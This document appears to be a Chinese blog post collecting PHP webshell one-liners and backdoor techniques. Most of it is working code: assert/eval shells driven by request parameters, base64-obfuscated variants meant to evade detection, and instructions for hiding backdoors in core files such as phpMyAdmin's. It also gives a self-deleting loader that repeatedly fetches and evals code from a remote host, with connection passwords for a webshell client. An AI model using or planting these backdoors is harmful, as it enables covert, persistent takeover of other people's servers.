1、

原一句话：<?php $_GET[a]($_GET[b]);?>
简单利用方法：
?a=assert&b=${fputs(fopen('d.php','w'),'<?php @eval($_POST[c])?>')};    
复杂利用方法：
?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};
URL解码：?a=assert&b=${fputs(fopen(base64_decode(Yy5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))};
base64解码：第一个是：c.php ；第二个是：<?php @eval($_POST[c]); ?>1
# 执行后当前目录生成c.php一句话木马，当传参a为eval时会报错木马生成失败，为assert时同样报错，但会生成木马，真可谓不可小视，简简单单的一句话，被延伸到这般应用。

改进：<?php extract($_REQUEST);@$d($_POST[b])?>
URL：IP/test.php?d=assert
密码:b        菜刀：eval

2、

原：@array_map(base64_decode($_REQUEST['xx']),(array)base64_decode($_REQUEST['sofia']));
改进：
    @array_map(assert,(array)base64_decode($_REQUEST['sofia']));
    连接方法：test.php?sofia=YXNzZXJ0KCRfUkVRVUVTVFsndnVsbiddKQ==    密码 ：vuln     脚本类型：PHP（eval）
[ test.php?sofia=assert($_REQUEST['vuln']) ]

3、暂无法用菜刀连接

    <?
    $Base = "base6"."4"."_decod"."e";
    $_clasc = $Base($_REQUEST['vuln']);
    $arr = array($Base($_POST['sofia']) => '|.*|e',);
    @array_walk($arr, $_clasc, '');
    ?>
详解：
vuln=cHJlZ19yZXBsYWNl(preg_replace的base64编码) 
sofia=cGhwaW5mbygp(phpinfo()的base64编码)
    <?
    $Base = "base6"."4"."_decod"."e";
    $_clasc = $Base($_REQUEST['vuln']);    //$_clasc=preg_replace
    $arr = array($Base($_POST['sofia']) => '|.*|e',);     //$arr = array('phpinfo()' => '|.*|e')
    @array_walk($arr, $_clasc, '');          //preg_replace('|.*|e',phpinfo(),'')
    ?>

维持后门：
1、

conifg.class.php文件内容：最好放在网站核心类文件中（比如phpMyAdmin\libraries\config\ConfigFile.class.php）
    <?php
    class Parse_Args {
    public function apply_filters($key) {
    assert($key);
    }
    }
   ?>
common.php文件内容：  （比如放在：phpMyAdmin\import.php）
  //执行代码，下面代码最好放在页面顶部，至少不要有require 文件
    require_once '..\..\path\config.class.php';
   @extract($_REQUEST);
    $reflectionMethod = new Parse_Args();
    $reflectionMethod -> apply_filters($s0fia);

菜刀URL：http://IP:80/path/common.php        密码：s0fia     脚本：eval

2、

shell.php  文件内容：（访问这个文件并提交post数据，生成2.php 一句话木马）
    <?php
    if($_POST['token'] == 'sofia'){
    require 'c:/www/1.log';
    }
1.log 文件内容：
 <?php 
   $fp = fopen("./2.php",'w');
   fwrite($fp,'<?php @eval($_POST[cmd])?>');
?>

3、插入到核心文件中：

<?php 
    if(@$_GET[session]=='TGYGFH'){
       @array_map($_GET['TMP'],(array)base64_decode($_REQUEST['TYLOHRY']));
        q
    }
?>
菜刀URL：http://192.168.179.139/php_web/testroot/1.php?session=TGYGFH&TMP=assert&TYLOHRY=YXNzZXJ0KCRfUkVRVUVTVFsndnVsbiddKQ==
密码：vuln           assert函数一般可以用菜刀eval连接

复现猥琐的后门，出自本文最后一个链接

条件：开启fastCGI。
局限：Apache、IIS、nginx重启后后门消失，不过可以配合这个链接创建永远存在的后门（就是将这个文件把该链接中web.php对应的PHP文件字符串替换下来，和一起存成 jpg 格式）

<?php
unlink($_SERVER['SCRIPT_FILENAME']);
ignore_user_abort(true);
set_time_limit(0);
$remote_file = 'http://xxx/1.txt';
while($code = file_get_contents($remote_file)){
@eval($code);
sleep(5);
};
?>

1.txt 内容：
 file_put_contents('./2.php','<?php @eval($_POST[cmd])?>');
注：eval 表示执行PHP代码；1.txt 内一句话木马必须用单引号（非双引号，否则输出 '<?php @eval() ?>' 到2.php 文件中）；
1.txt 可以是远程主机上的一句话文件，但一旦远程主机断网，再次连接后，删除2.php文件，则2.php文件不在自动创建，因为$remote_file不再是有效文件

还有一个大好处，1.txt 文件名后缀可以任意更换，只要$remote_file 的变量值对应一下就行了

参考链接：php一句话后门过狗姿势万千之后门构造与隐藏
那些强悍的PHP一句话后门
各种一句话木马大全
捡了一个非常淫荡的PHP后门，给跪了
【php】assert函数的用法：判断一个表达式是否成立（也可理解为执行PHP代码）